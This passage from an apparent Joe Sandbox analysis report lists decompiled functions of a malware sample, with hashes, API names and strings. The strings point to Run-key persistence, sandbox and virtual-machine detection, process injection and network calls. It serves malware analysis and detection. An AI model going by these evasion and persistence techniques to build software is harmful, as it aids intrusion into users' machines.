                                                                • Instruction Fuzzy Hash: 27221A66A0BA0295FB45EF65D8401B826E1FF56F84F444035EA4ED7696EF3CED82C320
                                                                Function 00007FF6A54A6760 Relevance: 47.5, APIs: 22, Strings: 5, Instructions: 276COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: Module$FileHandleName
                                                                • String ID: .exe$C:\Program Files (x86)\Microsoft\Temp$C:\Program Files (x86)\Microsoft\Temp\Microsoft-$Microsoft-$Software\Microsoft\Windows\CurrentVersion\Run
                                                                • API String ID: 4146042529-2756553381
                                                                • Opcode ID: 2a71203d9518e1d287a3932e4519e8c79eb2beeaa3c10df9b0b6ae9ac19400b1
                                                                • Instruction ID: a730e80d4f4287ff4fe5bf93bd3c484464e4478bf46a9c288a37f59c42f13e30
                                                                • Opcode Fuzzy Hash: 2a71203d9518e1d287a3932e4519e8c79eb2beeaa3c10df9b0b6ae9ac19400b1
                                                                • Instruction Fuzzy Hash: BEE10C3691EAC185E760DB21F4543ABB760FB96B44F404136E78E83AA9DF7CD944CB40
                                                                Function 00007FF6A54A6120 Relevance: 45.8, APIs: 20, Strings: 6, Instructions: 288COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: Module$FileHandleName
                                                                • String ID: .exe$.exe$C:\Windows\SysWOW64\$LMX-$C:\Windows\SysWOW64\$LMX-$SOFTWARE\$LMXconfig\startup$SysWOW-
                                                                • API String ID: 4146042529-1651104002
                                                                • Opcode ID: 4f83e9f4d30345e334b7ec35a9a80808e6ef3c4c416a05b7457e674f3cd80fec
                                                                • Instruction ID: acca2587fdcb3195a706fa0d8388ee54cd45b8f314b9847a1d01fabdedcd640d
                                                                • Opcode Fuzzy Hash: 4f83e9f4d30345e334b7ec35a9a80808e6ef3c4c416a05b7457e674f3cd80fec
                                                                • Instruction Fuzzy Hash: 88F11B3651EAC185E7A0DB24E4543EBB760FBC6B44F404132E68D83AAADF3CD945CB40
                                                                Function 00007FF6A54A20A0 Relevance: 35.2, APIs: 19, Strings: 1, Instructions: 236libraryloaderCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: shared_ptr$AddressProc$HandleModule
                                                                • String ID: \explorer.exe
                                                                • API String ID: 2988983344-1502772786
                                                                • Opcode ID: 3018014e4864420405ec0e365953c1fbaef1103286ab5cc4dc50a68c43fc39bc
                                                                • Instruction ID: b5a254d7c663c68154644c5be9aa644f9c37b805c306cdb48c9810ca3e133ca5
                                                                • Opcode Fuzzy Hash: 3018014e4864420405ec0e365953c1fbaef1103286ab5cc4dc50a68c43fc39bc
                                                                • Instruction Fuzzy Hash: 2CB1423261DA8585DB90DB25E4543AEA7A0FBC5F94F404431EB8E87BA8DF7CD844DB40
                                                                Function 00007FF6A54B9077 Relevance: 31.8, APIs: 21, Instructions: 306COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: Lockitstd::_$Lockit::_Lockit::~_$Getctype
                                                                • String ID:
                                                                • API String ID: 3087743877-0
                                                                • Opcode ID: 2361a5b3b48608ea8fa796e42cc97deb3cf1d54cd5aeb3db1031e14d02db689e
                                                                • Instruction ID: 00778ff8da502c5a07bfb9ed204ab019c3029025db7dd600b9eaa0fcbe7d7715
                                                                • Opcode Fuzzy Hash: 2361a5b3b48608ea8fa796e42cc97deb3cf1d54cd5aeb3db1031e14d02db689e
                                                                • Instruction Fuzzy Hash: C2D12775E0BA0285FB59FF65A8802B826A1FF56F84F464035D90DC36A6EF7CAD41C360
                                                                Function 00007FF6A54A5440 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 141networkCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: Internet$Open$CloseHandle
                                                                • String ID: MyUserAgent
                                                                • API String ID: 3289985339-3625013776
                                                                • Opcode ID: 8fbe67280ae240f18e1a13b5d75e9a2909d0e7ef35685aab634d7c544aee0820
                                                                • Instruction ID: 770af884279c5409a7f06cd758324e7b4d4d4bb10bc7568d4ee40cc13c34dbc7
                                                                • Opcode Fuzzy Hash: 8fbe67280ae240f18e1a13b5d75e9a2909d0e7ef35685aab634d7c544aee0820
                                                                • Instruction Fuzzy Hash: 42711E3262DA8186EB90DB15F4543AEB7A0FBD6B94F400035F68EC7A69DF7CD8458B00
                                                                Function 00007FF6A54A4CF0 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 256memoryinjectionCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: AllocMemoryProcessVirtualWrite
                                                                • String ID: @
                                                                • API String ID: 645232735-2766056989
                                                                • Opcode ID: 8a1fa989f4858665eeabfaeadc587ab6a1810c1852bec289a9f97b96221e1236
                                                                • Instruction ID: 1d9ac29087b9ac171303b4c76c4264f3c5875611eae69b6f3ac14b97bcbd10a5
                                                                • Opcode Fuzzy Hash: 8a1fa989f4858665eeabfaeadc587ab6a1810c1852bec289a9f97b96221e1236
                                                                • Instruction Fuzzy Hash: 03D1C576619B858ADBA0CB19E49076AB7A0F7C9B95F005536EB8E83B58DF3CD444CF00
                                                                Function 00007FF6A54A4830 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 254memoryinjectionCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: AllocMemoryProcessVirtualWrite
                                                                • String ID: @
                                                                • API String ID: 645232735-2766056989
                                                                • Opcode ID: 6970ae03f88652327e482fe574a379543fb15ec000507ad0cfab7f7a20beb8cb
                                                                • Instruction ID: ee4abdd86848fb53568f54d08d70fbd28b6e172a4bdf791cc8f99a992fb2053f
                                                                • Opcode Fuzzy Hash: 6970ae03f88652327e482fe574a379543fb15ec000507ad0cfab7f7a20beb8cb
                                                                • Instruction Fuzzy Hash: 69D1A776619B858AD7A0CB19E49476EB7A0F7C9B94F105136EB8E83B58DF3CD844CB00
                                                                Function 00007FF6A54A7B10 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 83registryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: Concurrency::details::_CriticalLock::_ReentrantScoped_lockScoped_lock::~_Value
                                                                • String ID: QEMU$SYSTEM\CurrentControlSet\Services\disk\Enum$SYSTEM\CurrentControlSet\Services\disk\Enum$VBOX$VMware
                                                                • API String ID: 2501560243-35660360
                                                                • Opcode ID: 32b867c8a10a82f0b59e06c1e1c5f64df85b6d17bba7828a39fd61eda85c0586
                                                                • Instruction ID: ee103552a8129bb9551ef501f88f244ffb6546b922675bf5b23c20dfcec0eb85
                                                                • Opcode Fuzzy Hash: 32b867c8a10a82f0b59e06c1e1c5f64df85b6d17bba7828a39fd61eda85c0586
                                                                • Instruction Fuzzy Hash: FE41873251DA4195FA60DB20E4503AA7770EB87B64F900332E7AD82ADADF7DE944CB00
                                                                Function 00007FF6A54A4300 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 143memoryinjectionCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: AllocConcurrency::details::EmptyMemoryProcessQueue::StructuredVirtualWorkWrite
                                                                • String ID: @
                                                                • API String ID: 2078502901-2766056989
                                                                • Opcode ID: 720be5aece8625d68157fe7d30f0092e187bde97b451141df1445f29913ff2dc
                                                                • Instruction ID: 222f22223cb1f0e81f77eccc4039e62e5b0579d3d31b12c68ff52bec567d4b07
                                                                • Opcode Fuzzy Hash: 720be5aece8625d68157fe7d30f0092e187bde97b451141df1445f29913ff2dc
                                                                • Instruction Fuzzy Hash: 1B71FB76619B858ADB60CB15E49432EB7A0F789F94F104136EB8E83B68DF7CD844CB00
                                                                Function 00007FF6A54A4590 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 142memoryinjectionCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: AllocMemoryProcessVirtualWrite
                                                                • String ID: @
                                                                • API String ID: 645232735-2766056989
                                                                • Opcode ID: b7335ffa399dc7a1ecaf5f8ac5da25a1710876b98c2cbf970a96baab5c45d301
                                                                • Instruction ID: 92e8f80c611374667113d33eebb3b358b6705a2a9982b8edf757394cb10bba12
                                                                • Opcode Fuzzy Hash: b7335ffa399dc7a1ecaf5f8ac5da25a1710876b98c2cbf970a96baab5c45d301
                                                                • Instruction Fuzzy Hash: B471D676619B858ADBA0CB15E45432AB7A0F789B85F505136EB8E83B68DF3CD845CB00
                                                                Function 00007FF6A54A79C0 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 67registryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: Value
                                                                • String ID: HARDWARE\DESCRIPTION\System\BIOS$Microsoft Corporation$Parallels$QEMU$SystemManufacturer$VMware$VirtualBox
                                                                • API String ID: 3702945584-1265467049
                                                                • Opcode ID: a01eb73f53c9e138d0334527873c8916d009393e5af37d8521e7e80f545b5860
                                                                • Instruction ID: b50495456ee4599b2f3a6ca83a5bbe003242d88f77bddb86026f900308d7116e
                                                                • Opcode Fuzzy Hash: a01eb73f53c9e138d0334527873c8916d009393e5af37d8521e7e80f545b5860
                                                                • Instruction Fuzzy Hash: 1E31543691D642A5EA60DB24E4507BA7760FF86774F900332E2BC82AD9DF7DDA05CB00
                                                                Function 00007FF6A54A7ED0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 120COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: Concurrency::details::EmptyQueue::StructuredWork$CloseHandle
                                                                • String ID: qemu-ga.exe$vboxservice.exe$vmware.exe
                                                                • API String ID: 619771974-1968340088
                                                                • Opcode ID: 1b16a05f1a8249cd373777c067ac6913075806d3c3b076337e32e7f875a4a25d
                                                                • Instruction ID: 310b2ccc44bb689748e64d504e9aed6eaf262a007a196e833c609bd8169e08d9
                                                                • Opcode Fuzzy Hash: 1b16a05f1a8249cd373777c067ac6913075806d3c3b076337e32e7f875a4a25d
                                                                • Instruction Fuzzy Hash: C251182151EA8191EA60DB15E4513AFB764FBC6B84F404132F78D87AEADF2CDA05CB00
                                                                Function 00007FF6A54FF600 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 227COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: ErrorLastNameTranslate$CodeInfoLocalePageValidValue
                                                                • String ID: utf8
                                                                • API String ID: 3069159798-905460609
                                                                • Opcode ID: b51e3f94ac5b4ce231a77dcbf3811d37adea6656337162e85f99b6cbee69ded4
                                                                • Instruction ID: 2bff01b263b2d658fba621664af15dfcbefeab99b88c49764140804c4ab2d133
                                                                • Opcode Fuzzy Hash: b51e3f94ac5b4ce231a77dcbf3811d37adea6656337162e85f99b6cbee69ded4
                                                                • Instruction Fuzzy Hash: FC917D36A0A78296FB64DB29E4412B933A4EF46F84F444131DA5C87795EF3CED9AC700
                                                                Function 00007FF6A5500048 Relevance: 10.7, APIs: 7, Instructions: 171COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: Value$Locale$CodeErrorInfoLastPageValid$DefaultEnumLocalesProcessSystemUser
                                                                • String ID:
                                                                • API String ID: 2591520935-0
                                                                • Opcode ID: 2b29f59d5568d3ebf7f476ee8ba5de49d3ae80982f4af3ed67730104d37e83dc
                                                                • Instruction ID: 7dac530c8d15aee091e34749e385ab9b76ec055cb503acb7ef1e9826f1b2d64f
                                                                • Opcode Fuzzy Hash: 2b29f59d5568d3ebf7f476ee8ba5de49d3ae80982f4af3ed67730104d37e83dc
                                                                • Instruction Fuzzy Hash: 64716A26B1A6529EFB10DB65D8506BC23E0AF46F48F844436CE4E936E5EF3CAC49C310
                                                                Function 00007FF6A54DDBA8 Relevance: 10.6, APIs: 7, Instructions: 71COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                • String ID:
                                                                • API String ID: 3140674995-0
                                                                • Opcode ID: f000ac86d18801c36d5a2e3d59a2646ceb78fb77be1baa79ab305fe03f1fc4d8
                                                                • Instruction ID: 5c567a0af80d7545e28e22b13f4f7cdadce36e25c956840afd81ec9e898afa3d
                                                                • Opcode Fuzzy Hash: f000ac86d18801c36d5a2e3d59a2646ceb78fb77be1baa79ab305fe03f1fc4d8
                                                                • Instruction Fuzzy Hash: FF316076619B818AEB60CF60E8403ED73A0FB85B48F44403ADA4E87B95DF78C948C700
                                                                Function 00007FF6A54FAE28 Relevance: 9.3, APIs: 6, Instructions: 335timeCOMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                • _get_daylight.LIBCMT ref: 00007FF6A54FAE6D
                                                                  • Part of subcall function 00007FF6A54FACB4: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6A54FACC8
                                                                  • Part of subcall function 00007FF6A54F3DF0: HeapFree.KERNEL32(?,?,00000000,00007FF6A54FE3EE,?,?,?,00007FF6A54FE76B,?,?,00000000,00007FF6A54FECA9,?,?,?,00007FF6A54FEBDB), ref: 00007FF6A54F3E06
                                                                  • Part of subcall function 00007FF6A54F3DF0: GetLastError.KERNEL32(?,?,00000000,00007FF6A54FE3EE,?,?,?,00007FF6A54FE76B,?,?,00000000,00007FF6A54FECA9,?,?,?,00007FF6A54FEBDB), ref: 00007FF6A54F3E10
                                                                  • Part of subcall function 00007FF6A54E30E4: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF6A54E3093,?,?,?,?,?,00007FF6A54E2F7E), ref: 00007FF6A54E30ED
                                                                  • Part of subcall function 00007FF6A54E30E4: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF6A54E3093,?,?,?,?,?,00007FF6A54E2F7E), ref: 00007FF6A54E3112
                                                                • _get_daylight.LIBCMT ref: 00007FF6A54FAE5C
                                                                  • Part of subcall function 00007FF6A54FAD14: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6A54FAD28
                                                                • _get_daylight.LIBCMT ref: 00007FF6A54FB0D2
                                                                • _get_daylight.LIBCMT ref: 00007FF6A54FB0E3
                                                                • _get_daylight.LIBCMT ref: 00007FF6A54FB0F4
                                                                • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF6A54FB334), ref: 00007FF6A54FB11B
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
                                                                • String ID:
                                                                • API String ID: 4070488512-0
                                                                • Opcode ID: b76617314cf8a75b34ed908ae4ab7c152fd67c1843263fdcdf37470556e16e62
                                                                • Instruction ID: 92fca410ce37de98d7aeec5ed660f0ff2e5b93892890feaa05efeec419374822
                                                                • Opcode Fuzzy Hash: b76617314cf8a75b34ed908ae4ab7c152fd67c1843263fdcdf37470556e16e62
                                                                • Instruction Fuzzy Hash: 30D1D226A0A2428AEB24DF2AD4501BD77A1EF86F98F444136EE4DC7A95DF3CEC45C740
                                                                Function 00007FF6A54E2DC8 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
                                                                • Associated: 0000000E.00000002.1334757766.00007FF6A54A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334835652.00007FF6A5507000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334863602.00007FF6A551D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                • Associated: 0000000E.00000002.1334885866.00007FF6A5521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_14_2_7ff6a54a0000_System-f4855f59e0.jbxd
                                                                Similarity
                                                                • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                • String ID:
                                                                • API String ID: 1239891234-0
                                                                • Opcode ID: 470f221d805a3fad8ae3c12b967cdddf6fe20f5238eb425668d2eef7dd63a99e
                                                                • Instruction ID: a583d8ea09d89c92d4a7ef3192656d27ee244fc75d2345ad83e7f2f3331d41cc
                                                                • Opcode Fuzzy Hash: 470f221d805a3fad8ae3c12b967cdddf6fe20f5238eb425668d2eef7dd63a99e
                                                                • Instruction Fuzzy Hash: C6315336619F8185EB60CF25E8402EE73A4FB86B58F540136EA9D83B55DF3CD9458B00
                                                                Function 00007FF6A54D4988 Relevance: 7.9, APIs: 5, Instructions: 440COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 0000000E.00000002.1334784308.00007FF6A54A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6A54A0000, based on PE: true
